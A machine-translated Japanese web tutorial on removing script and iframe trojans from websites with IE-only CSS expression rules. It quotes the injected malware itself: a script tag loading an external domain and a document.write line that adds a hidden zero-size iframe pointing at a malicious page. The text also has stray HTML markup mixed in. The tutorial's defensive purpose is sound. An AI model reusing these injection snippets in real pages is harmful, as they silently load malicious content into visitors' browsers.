ホームページ >ウェブフロントエンド >jsチュートリアル >すべての Web ページの Trojans_JavaScript スキルを解決する 2 行のコード

すべての Web ページの Trojans_JavaScript スキルを解決する 2 行のコード

WBOY
WBOYオリジナル
2016-05-16 19:05:364420ブラウズ

少し前に、あるコード行で iframe マルウェアの問題 (サーバー側のインジェクション、クライアント側の ARP インジェクションなど) が解決されました。これは、確かに風雨を避ける良い方法であると認識していました。しかし、今では、インターネット トロイの木馬をハングアップする方法が本当に変わりました。最近では、「スクリプト」トロイの木馬をハングアップするのが一般的です。私は、このようなサイトをいくつか見たことがあります。ページが追加されました:

注意、次のアドレスにはトロイの木馬が含まれています。簡単にアクセスしないでください:







汗だくなので、同じものを N 個続けて挿入しました。 <script> タグ。私のコンピュータにはパッチが適用されているので、この http://vccd.cn に直接アクセスして (または Thunder を使用して直接ダウンロードして)、次のように表示されました: <br><br>document.write("<div style=' display :none'>") <br>document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe> " ) <br>document.write("</div>") <br>また、Thunder を使用してファイル http://a.158dm.com/b1.htm をダウンロードしました。一見すると、混乱しているように見えました。汗、でも QQ 番号に似た番号を見つけたので、カーンに直接調べてみると、オンライン競馬を提供する専門組織がありました。料金はかなり高いですよ! <br><br>... <br>var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\XXXXXLD"; ) (以下に N 個の統計的な JS コードがあります) <br> 上記の状況については、無駄に無視することはできません、兄さん、方法を考えてください。緑豆のお粥を食べましたが、砂糖がたっぷり入っていて美味しかったです。ある方法を考えました。ちょっとした分析で答えが分かりました。 <script>トロイの木馬の特徴を見てみましょう: <br><br><script src=http://vccd.cn></script>

ところで、スクリプト トロイの木馬 src は通常、外部ドメインからのものです。つまり、src が自分の Web サイト上のスクリプトである場合は、通常、トロイの木馬の元の形式を確認する必要はありません。 iframe、JS コード、またはその他の code が出力される場合でも、その数に関係なく、それらが来るだけ kill されます。

一緒に CSS を書いて、1 つずつ取得してみましょう。

解決策 1:



iframe{n1ifm:expression(this.src='about:blank',this .outerHTML ='');}/*このコード行は、IFRAME トロイの木馬のハングの問題を解決するためのものです*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0 ) ?document.write('トロイの木馬は正常に分離されました!'):'');}

原則: <script> でマークされた src を取り出して小文字に変換し、それが正しいかどうかを確認します。 「http」で始まる外部ドメインの JS スクリプト ファイルの場合、ページの内容が消去され、「トロイの木馬は正常に分離されました」と書き込まれます。それ以外の場合は通常通り表示されます。 <br> </div>欠点: 訪問者は <script> トロイの木馬に感染したページを見ることができません。 <br><br>解決策 2: <br><br><br><br><div class="codetitle"><span>コードをコピーします<a style="CURSOR: pointer" data="41849" class="copybut" id="copybut41849" onclick="doCopy('code41849')"><u></u> コードは次のとおりです:</a></span></div>iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} <div class="codebody" id="code41849">script{no2js:expression((this.src.toLowerCase().indexOf(' http') ==0)?document.close():'');} <br><br><br>原則: document.close() を使用して、JS ファイルの document.write() を強制的に閉じます。外部ドメイン。トロイの木馬のコンテンツは書き込まれる時間がなく、その一部だけが強制的にキャッシュされて出力され、残りは再度書き込まれません </div>解決策 3: <br><br><br><br> <div class="codetitle"><span>コードをコピー<a style="CURSOR: pointer" data="19823" class="copybut" id="copybut19823" onclick="doCopy('code19823')"><u></u> コードは次のとおりです:</a></span></div>iframe{ni3fm:expression(this.src='about:blank',this. externalHTML='');} <div class="codebody" id="code19823"> script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} <br><br><br>原則: JS ファイルが外部ドメインに到着すると、IE のプライベート execCommand メソッドがすぐに呼び出され、そのページに対するすべてのリクエストが停止されるため、外部ドメインからの後続の JS ファイルのダウンロードも強制的に停止されます。ブラウザの「停止」ボタンをクリックするようなものです。これは JS が IE の停止ボタンをシミュレートする方法のようです。 <br><br>解決策4: <br><br><div class="codetitle"> <span><a style="CURSOR: pointer" data="59344" class="copybut" id="copybut59344" onclick="doCopy('code59344')"><u>コードをコピー</u></a></span> コードは次のとおりです:</div> <div class="codebody" id="code59344"> <br>iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} <br>script{noj4s:expression(if(this.src.indexOf('http')== 0 )this.src='res://ieframe.dll/dnserror.htm');} <br> </div> <br>原則: 外部ドメインの JS ファイルの src をローカルのアドレスに書き換えます。このような IE404 エラー ページでは、外部ドメインからの JS コードはダウンロードされません。 <br><br>解決策 5: <br><br><div class="codetitle"> <span><a style="CURSOR: pointer" data="40781" class="copybut" id="copybut40781" onclick="doCopy('code40781')"><u>コードをコピーします</u></a></span> コードは次のとおりです:</div> <div class="codebody" id="code40781"> <br>iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} <br>script{noj5s:expression((this.id.toLowerCase().indexOf(' lh') ==0)?document.write('トロイの木馬は正常に分離されました!'):''));} <br> </div> <br>5 番目のオプションでは、ページの HTML ソース コード <script&gt ; 次の「lh」は、lhWeatherJSapi などの接頭辞を付けて追加する必要があります。<script src="***/**.js" id="lhSearchJSapi"></script>

次のページ コードにはトロイの木馬のアドレスが含まれており、このトロイの木馬はページ上で 6 回繰り返されます。上記で説明したさまざまな解決策を使用してください。テストしてみてください! (このテストは危険です。必ずすべてのパッチを適用してください)

コードをコピーします コードは次のとおりです。





JS トロイの木馬プロセスを迅速に終了する CSS コード 🎜 >